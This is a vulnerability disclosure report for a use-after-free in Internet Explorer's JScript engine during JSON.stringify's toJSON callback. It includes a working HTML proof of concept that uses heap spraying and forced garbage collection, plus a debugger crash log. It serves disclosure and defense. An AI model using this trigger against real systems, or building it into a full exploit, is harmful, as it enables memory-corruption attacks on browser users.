IE: Use-after-free in JScript arguments during toJSON callback

There is a use-after-free issue in JSCript (triggerable via Internet Explorer) where the members of the 'arguments' object aren't tracked by the garbage collector during the 'toJSON' callback. Thus, during the 'toJSON' callback, it is possible to assign a variable to the 'arguments' object, have it garbage-collected (as long as it is not referenced anywhere else) and still access it later. Note that, like in some previously reported JSCript issues, this is a use-after-free on a JSCript variable (VAR structure), so in order to trigger a crash, the entire block of variables must be freed.

PoC for Internet Explorer is below. I tested it on multiple Windows version with the latest security patches applied.

===========================================================

<!-- saved from url=(0014)about:internet -->
<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta>
<script language=\"Jscript.Encode\">
    var spray = new Array();

    function F() {
        alert('callback');

        // 2. Create a bunch of objects
        for (var i = 0; i < 20000; i++) spray[i] = new Object();

        // 3. Store a reference to one of them in the arguments array
        //    The arguments array isn't tracked by garbage collector
        arguments[0] = spray[5000];

        // 4. Delete the objects and call the garbage collector
        //    All JSCript variables get reclaimed... 
        for (var i = 0; i < 20000; i++) spray[i] = 1;
        CollectGarbage();

        // 5. But we still have reference to one of them in the
        //    arguments array
        alert(arguments[0]);
    }

    // 1. Cause toJSON callback to fire
    var o = {toJSON:F}
    JSON.stringify(o);

    alert('done');

</script>

===========================================================


Debug log:

===========================================================

(1cf4.154): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000080 ebx=05ecc218 ecx=00000080 edx=00000001 esi=05f0c3c8 edi=05fb12e8
eip=6e25f52a esp=05ecc180 ebp=05ecc1b4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
jscript!PrepareInvoke+0x12a:
6e25f52a 0fb707          movzx   eax,word ptr [edi]       ds:002b:05fb12e8=????

0:009> k
 # ChildEBP RetAddr  
00 05ecc1b4 6e262b75 jscript!PrepareInvoke+0x12a
01 05ecc2a8 6e2660ee jscript!VAR::InvokeByDispID+0x1c5
02 05ecc4a0 6e26244a jscript!CScriptRuntime::Run+0x2e4e
03 05ecc594 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
04 05ecc5ec 6e25bec9 jscript!ScrFncObj::Call+0x81
05 05ecc68c 6e262aed jscript!NameTbl::InvokeInternal+0x399
06 05ecc78c 6e2a862c jscript!VAR::InvokeByDispID+0x13d
07 05ecc800 6e2a8c2e jscript!GCProtectKeyAndCall+0xed
08 05ecc898 6e2a93ce jscript!JSONApplyFilters+0x125
09 05ecc90c 6e2ad9a2 jscript!JSONStringifyObject+0xac
0a 05ecc9b4 6e269e3a jscript!JsJSONStringify+0x382
0b 05ecca1c 6e25bec9 jscript!NatFncObj::Call+0xea
0c 05eccabc 6e25e476 jscript!NameTbl::InvokeInternal+0x399
0d 05eccc78 6e262aa5 jscript!VAR::InvokeByName+0x8f6
0e 05eccd70 6e2660ee jscript!VAR::InvokeByDispID+0xf5
0f 05eccf68 6e26244a jscript!CScriptRuntime::Run+0x2e4e
10 05ecd05c 6e2622a1 jscript!ScrFncObj::CallWithFrameOnStack+0xaa
11 05ecd0b4 6e257124 jscript!ScrFncObj::Call+0x81
12 05ecd170 6e257f75 jscript!CSession::Execute+0x314
13 05ecd1d0 6e256c83 jscript!COleScript::ExecutePendingScripts+0x2d5
14 05ecd274 6e2569b9 jscript!COleScript::ParseScriptTextCore+0x2c3
15 05ecd2a0 70209251 jscript!COleScript::ParseScriptText+0x29
16 05ecd2d8 70122a27 MSHTML!CActiveScriptHolder::ParseScriptText+0x51
17 05ecd348 70121fe2 MSHTML!CScriptCollection::ParseScriptText+0x182
18 05ecd434 701226ee MSHTML!CScriptData::CommitCode+0x312
19 05ecd4b0 7012153a MSHTML!CScriptData::Execute+0x1ba
1a 05ecd4d0 701e99b6 MSHTML!CHtmScriptParseCtx::Execute+0xaa
1b 05ecd524 70159c7d MSHTML!CHtmParseBase::Execute+0x186
1c 05ecd544 70159599 MSHTML!CHtmPost::Broadcast+0xfd
1d 05ecd66c 7017647d MSHTML!CHtmPost::Exec+0x339
1e 05ecd68c 70176376 MSHTML!CHtmPost::Run+0x3d
1f 05ecd6ac 70176308 MSHTML!PostManExecute+0x60
20 05ecd6c0 70176279 MSHTML!PostManResume+0x6f
21 05ecd6f0 70208447 MSHTML!CHtmPost::OnDwnChanCallback+0x39
22 05ecd708 7015be1d MSHTML!CDwnChan::OnMethodCall+0x27
23 05ecd780 702f1207 MSHTML!GlobalWndOnMethodCall+0x1bd
24 05ecd7d0 7015c5a2 MSHTML!GlobalWndProc_SEH+0x317
25 05ecd7ec 7562624b MSHTML!GlobalWndProc+0x52
26 05ecd818 756174dc USER32!_InternalCallWinProc+0x2b
27 05ecd8fc 7561661b USER32!UserCallWinProcCheckWow+0x3ac
28 05ecd970 756163f0 USER32!DispatchMessageWorker+0x21b
29 05ecd97c 717e6456 USER32!DispatchMessageW+0x10
2a 05ecfb0c 717e73e3 IEFRAME!CTabWindow::_TabWindowThreadProc+0xa36
2b 05ecfbcc 7223df6c IEFRAME!LCIETab_ThreadProc+0x403
2c 05ecfbe4 7130289d msIso!_IsoThreadProc_WrapperToReleaseScope+0x1c
2d 05ecfc1c 75520419 IEShims!NS_CreateThread::AutomationIE_ThreadProc+0x8d
2e 05ecfc2c 7789662d KERNEL32!BaseThreadInitThunk+0x19
2f 05ecfc88 778965fd ntdll!__RtlUserThreadStart+0x2f
30 05ecfc98 00000000 ntdll!_RtlUserThreadStart+0x1b

===========================================================


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available (whichever is earlier), the bug
report will become visible to the public.


Related CVE Numbers: CVE-2019-1429.



Found by: ifratric@google.com